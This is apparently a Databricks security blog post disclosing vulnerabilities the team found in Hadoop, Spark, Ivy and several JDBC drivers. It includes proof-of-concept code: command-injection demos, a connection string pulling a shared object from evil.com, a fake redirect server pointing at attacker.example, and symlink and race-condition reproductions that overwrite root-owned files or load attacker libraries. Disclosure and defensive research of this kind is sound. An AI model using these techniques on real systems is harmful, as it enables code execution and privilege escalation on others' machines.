The Databricks Product Security team is deeply committed to ensuring the security and integrity of its products, which are built on top of and integrated with a variety of open source projects. Recognizing the importance of these open source foundations, the team actively contributes to the security of these projects, thereby enhancing the overall security posture of both Databricks products and the broader open source ecosystem. This commitment is manifested through several key activities, including identifying and reporting vulnerabilities, contributing patches, and participating in security reviews and audits of open source projects. By doing so, Databricks not only safeguards its own products but also supports the resilience and security of the open source projects it relies on.
This blog will provide an overview of the technical details of some of the vulnerabilities that the team discovered.
Apache Hadoop Common offers an API that allows users to untar an archive using the tar Unix tool. To do so, it builds a command line, potentially also involving gzip, and executes it. The issue is that the path to the archive, which could be under user control, is not properly escaped in some situations. This could allow a malicious user to inject their own commands through the archive name, for example via shell metacharacters.
The vulnerable code can be found here.
Note that makeSecureShellPath only escapes single quotes but doesn’t add any. There was some debate as to the consequences of the issue for Hadoop itself, but since this is a publicly offered API, it ultimately warranted a fix. Databricks was invested in fixing this issue because Spark’s unpack code leveraged the vulnerable code.
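To illustrate the point, here is a minimal sketch, not Hadoop’s actual code, of why escaping single quotes is not enough when the value is never wrapped in quotes (the file name and injected command below are made up):

    public class UnTarSketch {
        // Mirrors the behavior described above: escape single quotes, add none.
        static String makeSecureShellPath(String path) {
            return path.replace("'", "\\'");
        }

        public static void main(String[] args) throws Exception {
            // Attacker-controlled archive name containing shell metacharacters.
            String archive = "/tmp/foo.tar; touch /tmp/pwned #";
            String cmd = "tar -xf " + makeSecureShellPath(archive) + " -C /tmp/out";
            // Because the path is unquoted, the injected command executes.
            new ProcessBuilder("bash", "-c", cmd).inheritIO().start().waitFor();
        }
    }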
Apache Spark™ uses an API to map a given user name to the set of groups it belongs to. One of the implementations is ShellBasedGroupsMappingProvider, which leveraged the id Unix command. The username passed to the function was appended to the command without being properly escaped, potentially allowing arbitrary command injection.
The vulnerable code could be found here.
We had to figure out if this provider could be reached with untrusted user input, and found the following path:
Ironically, the Spark UI HTTP security filter could allow that code to be reached via the doAs query parameter (see here). Fortunately, checks in isUserInACL prevented this vulnerability from being triggered in a default configuration.
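For illustration, here is a hedged Java sketch of the unsafe pattern (Spark’s actual implementation is Scala, and the class and method names below are ours, not Spark’s):

    public class GroupsMappingSketch {
        // The username is concatenated into a shell command without escaping,
        // so shell metacharacters inside it are interpreted by bash.
        static String getUnixGroups(String username) throws Exception {
            String cmd = "id -Gn " + username;
            Process p = new ProcessBuilder("bash", "-c", cmd).start();
            return new String(p.getInputStream().readAllBytes());
        }

        public static void main(String[] args) throws Exception {
            // A "username" carrying an injected command:
            System.out.println(getUnixGroups("nobody; touch /tmp/pwned"));
        }
    }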
Apache Ivy supports a packaging attribute that allows artifacts to be unpacked on the fly. The function used to perform the Zip unpacking didn’t check for “../” in the Zip entry names, allowing for a directory traversal type of attack, also known as “zip slip”.
The vulnerable code could be found here.
This could allow a user with the ability to feed Ivy a malicious module descriptor to write files outside of the local download cache.
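The pattern, in a simplified Java sketch that is not Ivy’s actual code, along with the kind of check that prevents it:

    import java.io.File;
    import java.io.IOException;
    import java.nio.file.Files;
    import java.util.zip.ZipEntry;
    import java.util.zip.ZipInputStream;

    public class ZipSlipSketch {
        public static void unzip(File archive, File destDir) throws IOException {
            try (ZipInputStream zip = new ZipInputStream(Files.newInputStream(archive.toPath()))) {
                ZipEntry entry;
                while ((entry = zip.getNextEntry()) != null) {
                    // Vulnerable: the entry name is joined to destDir without any
                    // "../" check, so "../../outside.txt" escapes the cache directory.
                    File out = new File(destDir, entry.getName());
                    // A fix validates the canonical path before writing, e.g.:
                    // if (!out.getCanonicalPath().startsWith(destDir.getCanonicalPath() + File.separator))
                    //     throw new IOException("Blocked zip slip entry: " + entry.getName());
                    if (entry.isDirectory()) {
                        out.mkdirs();
                        continue;
                    }
                    out.getParentFile().mkdirs();
                    Files.copy(zip, out.toPath());
                }
            }
        }
    }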
The SQLite JDBC driver can be made to load a remote extension due to predictable temporary file naming when a remote database file is loaded with jdbc:sqlite::resource and the enable_load_extension option, which enables extension loading.
The main issue is the use of the hashCode method to generate a temporary file name. Since hashCode produces the same output for the same string across JVMs, an attacker can predict the output and, therefore, the location of the downloaded file.
The vulnerable code can be found here.
While the issue can be triggered in one step, here is a breakdown for simplicity:
Using the following connection string: “jdbc:sqlite::resource:http://evil.com/evil.so?enable_load_extension=true”
This results in the .so file being downloaded to a predictable location in the /tmp folder; it can later be loaded using: “select load_extension('/tmp/sqlite-jdbc-tmp-{NUMBER}.db')”
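The predictability is easy to demonstrate: String.hashCode is fully specified by the Java language, so it returns the same value on every JVM. A small sketch (the exact string the driver hashes may differ slightly from this illustration):

    public class PredictTempName {
        public static void main(String[] args) {
            String resource = "http://evil.com/evil.so";
            // Identical on every JVM, so an attacker can compute it offline
            // and know where the downloaded file will land.
            int hash = resource.hashCode();
            System.out.println("/tmp/sqlite-jdbc-tmp-" + hash + ".db");
        }
    }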
JDBC driver scrutiny has increased in the last few years, thanks to the work of people like pyn3rd, who presented their work at security conferences worldwide, notably “Make JDBC Attack Brilliant Again.” This issue is a byproduct of their work, as it looks very similar to another issue they reported in the Snowflake JDBC driver.
The core of the issue resides in the openBrowserWindow function that can be found here.
This function executes a command built from the redirect URI, which could be provided by an untrusted source.
To trigger the issue, one can specify a connection string such as jdbc:hive2://URL/default;auth=browser;transportMode=http;httpPath=jdbc;ssl=true, which uses the browser authentication mechanism, pointed at an endpoint that returns a 302 with a Location header (as well as an X-Hive-Client-Identifier header) to provoke the faulty behavior. The fact that ssoURI is a Java URI restricts the freedom an attacker has when crafting the command line.
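As a hedged sketch of the server side of such a test (the endpoint path, port, and header values here are illustrative assumptions), a minimal HTTP handler only needs to answer with a 302 and a crafted Location header:

    import com.sun.net.httpserver.HttpServer;
    import java.net.InetSocketAddress;

    public class FakeSsoEndpoint {
        public static void main(String[] args) throws Exception {
            HttpServer server = HttpServer.create(new InetSocketAddress(8080), 0);
            server.createContext("/jdbc", exchange -> {
                // Redirect the driver's browser-auth flow to an attacker-chosen URI.
                exchange.getResponseHeaders().add("Location", "https://attacker.example/sso?payload=crafted");
                exchange.getResponseHeaders().add("X-Hive-Client-Identifier", "client-1");
                exchange.sendResponseHeaders(302, -1);
                exchange.close();
            });
            server.start();
        }
    }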
Spark's ThriftHttpServlet can be made to accept a cookie as a means of authenticating a user. This behavior is controlled by the hive.server2.thrift.http.cookie.auth.enabled configuration option (its default value depends on the project, but some set it to true). The validateCookie function verifies the cookie and ultimately calls CookieSigner.verifyAndExtract. The issue is that, on verification failure, an exception is raised that returns both the received signature and the expected valid one, allowing a user to resend the request with the valid signature.
The vulnerable code can be found here.
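Conceptually, the flaw looks like the following simplified sketch (ours, not the project’s verbatim code): the failure path of the verification helper echoes the expected signature back in the exception message, which ends up in the response sent to the client.

    import javax.crypto.Mac;
    import javax.crypto.spec.SecretKeySpec;
    import java.nio.charset.StandardCharsets;
    import java.util.Base64;

    public class LeakyCookieSigner {
        private static final String SEPARATOR = "&s=";
        private final byte[] secret;

        public LeakyCookieSigner(byte[] secret) { this.secret = secret; }

        public String verifyAndExtract(String signedValue) throws Exception {
            int index = signedValue.lastIndexOf(SEPARATOR);
            String rawValue = signedValue.substring(0, index);
            String receivedSignature = signedValue.substring(index + SEPARATOR.length());
            String expectedSignature = sign(rawValue);
            if (!expectedSignature.equals(receivedSignature)) {
                // Bug: the expected (valid) signature is leaked to the caller and,
                // through the servlet's error handling, to the client, who can
                // simply resend the cookie with that value.
                throw new IllegalArgumentException("Invalid sign, original = "
                        + receivedSignature + " current = " + expectedSignature);
            }
            return rawValue;
        }

        private String sign(String value) throws Exception {
            Mac mac = Mac.getInstance("HmacSHA256");
            mac.init(new SecretKeySpec(secret, "HmacSHA256"));
            return Base64.getEncoder().encodeToString(mac.doFinal(value.getBytes(StandardCharsets.UTF_8)));
        }
    }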
Example output returned to the client:
Both Apache Hive and Apache Spark™ were vulnerable to this and were fixed with the following PRs:
The timeline for this issue to be fixed and published illustrates some of the difficulties encountered when reporting vulnerabilities to open source projects:
The Amazon JDBC Driver for Redshift is a Type 4 JDBC driver that enables database connectivity using the standard JDBC APIs provided in the Java Platform, Enterprise Edition. This driver allows any Java application, application server, or Java-enabled applet to access Redshift.
If the JDBC driver is used across a privilege boundary, an attacker can abuse the Redshift JDBC Driver's logging functionality to append partially controlled log contents to any file on the filesystem. The contents can contain newlines and arbitrary characters, and can be used to elevate privileges.
In the connection URL, a "LogPath" variable can be used to supply the path in which log files should be stored.
This results in files such as "redshift_jdbc_connection_XX.log," where XX is a sequential number within the directory, and log entries are written to the file as expected. When creating these files, symbolic links are honored, and the log contents are written to the target of the link.
By using a controlled directory and symlinking to critical files, a user in our environment can gain a controlled write to arbitrary root-owned files and elevate privileges on the system.
The source code for the Redshift JDBC logfile handling is available at the following repo: https://github.com/aws/amazon-redshift-jdbc-driver/blame/33e046e1ccef43517fe4deb96f38cc5ac2bc73d1/src/main/java/com/amazon/redshift/logger/LogFileHandler.java#L225
To recreate this, you can create a directory in /tmp, such as “/tmp/logging.” Within this directory, create symbolic links with filenames matching the pattern redshift_jdbc_connection_XX.log, where the number increments each time the Redshift JDBC connector is used.
These symbolic links must point to the file you wish to append to. The attacker can then trigger the use of the Redshift JDBC connector, which follows the symlink and appends log contents to the target file.
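Put together, a reproduction could look like the following sketch (the host, credentials, log file numbering, and symlink target are illustrative assumptions; the LogLevel/LogPath options are passed as driver properties here):

    import java.nio.file.Files;
    import java.nio.file.Path;
    import java.sql.Connection;
    import java.sql.DriverManager;
    import java.util.Properties;

    public class RedshiftLogSymlinkRepro {
        public static void main(String[] args) throws Exception {
            Path dir = Files.createDirectories(Path.of("/tmp/logging"));
            // Pre-create symlinks matching the expected log file names so the
            // driver's log writes land on the link target instead.
            for (int i = 1; i <= 5; i++) {
                Path link = dir.resolve("redshift_jdbc_connection_" + i + ".log");
                if (Files.notExists(link)) {
                    Files.createSymbolicLink(link, Path.of("/path/to/root-owned-file"));
                }
            }
            // Trigger logging; LogPath points the driver at the attacker-controlled
            // directory (connection details are placeholders).
            Properties props = new Properties();
            props.setProperty("user", "awsuser");
            props.setProperty("password", "password");
            props.setProperty("LogLevel", "6");
            props.setProperty("LogPath", "/tmp/logging");
            try (Connection c = DriverManager.getConnection(
                    "jdbc:redshift://example-cluster.example.com:5439/dev", props)) {
                // Any activity on the connection produces log entries, which are
                // appended through the symlink to the target file.
            }
        }
    }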
The lz4-java library (a Java wrapper around the lz4 library) contains a file-based race condition vulnerability that occurs when the compiled native library is dropped onto disk. Large Java applications such as Spark and Hadoop use this library heavily.
The following code demonstrates this vulnerability:
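(The snippet below is a simplified reconstruction of the pattern; the names and bundled resource path are illustrative rather than lz4-java’s verbatim source.)

    import java.io.File;
    import java.io.FileOutputStream;
    import java.io.InputStream;

    public class NativeLoaderSketch {
        public static void loadNativeLibrary() throws Exception {
            // A ".lck" marker is created first; its name determines the ".so" path.
            File lockFile = File.createTempFile("liblz4-java-", ".so.lck");
            File soFile = new File(lockFile.getAbsolutePath().replaceFirst("\\.lck$", ""));

            // The shared object bundled inside the jar is copied next to the marker.
            try (InputStream in = NativeLoaderSketch.class.getResourceAsStream("/liblz4-java.so");
                 FileOutputStream out = new FileOutputStream(soFile)) {
                in.transferTo(out);
            }

            // ...and then loaded. Anyone who saw the ".lck" appear knows this path
            // before the write and the load happen.
            System.load(soFile.getAbsolutePath());
        }
    }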
As you can see, this code writes a .so stored within the jar file out to a temporary directory before loading and executing it. The createTempFile function is used to generate a unique path to avoid collisions. Before writing the file to disk, the code creates a variant of the file with a .lck extension, presumably to prevent collisions with other processes using the library. However, the .lck file lets an attacker watching the directory learn the file name as soon as the .lck is created, race the creation of the .so, and plant a symbolic link at that path pointing anywhere on the filesystem.
The ramifications of this are twofold: first, the attacker can overwrite any file on the system with the contents of the .so file, which may allow an unprivileged attacker to overwrite root-owned files. Second, the symlink can be replaced between the write and the load, allowing the attacker to have a custom shared object they provide loaded by the victim process (e.g., as root). If this library is used across a privilege boundary, this may grant an attacker code execution at an elevated privilege level.
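To make the race concrete, here is a hedged sketch of what the watching process could look like (the temporary directory, name pattern, and symlink target are illustrative assumptions):

    import java.nio.file.FileAlreadyExistsException;
    import java.nio.file.FileSystems;
    import java.nio.file.Files;
    import java.nio.file.Path;
    import java.nio.file.StandardWatchEventKinds;
    import java.nio.file.WatchEvent;
    import java.nio.file.WatchKey;
    import java.nio.file.WatchService;

    public class TempDirWatcher {
        public static void main(String[] args) throws Exception {
            Path tmp = Path.of("/tmp");
            try (WatchService watcher = FileSystems.getDefault().newWatchService()) {
                tmp.register(watcher, StandardWatchEventKinds.ENTRY_CREATE);
                while (true) {
                    WatchKey key = watcher.take();
                    for (WatchEvent<?> event : key.pollEvents()) {
                        String name = event.context().toString();
                        if (name.startsWith("liblz4-java-") && name.endsWith(".lck")) {
                            // The ".so" path is the ".lck" path minus its extension.
                            Path target = tmp.resolve(name.substring(0, name.length() - ".lck".length()));
                            try {
                                // Win the race: the victim's write and load now follow the link.
                                Files.createSymbolicLink(target, Path.of("/path/of/attackers/choosing.so"));
                            } catch (FileAlreadyExistsException lostRace) {
                                // Too slow this time; keep watching.
                            }
                        }
                    }
                    key.reset();
                }
            }
        }
    }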
At Databricks, we recognize that enhancing the security of the open source software we utilize is a collective effort. We are committed to proactively improving the security of our contributions and dependencies, fostering collaboration within the community, and implementing best practices to safeguard our systems. By prioritizing security and encouraging transparency, we aim to create a more resilient open source environment for everyone. Learn more about Databricks Security on our Security and Trust Center.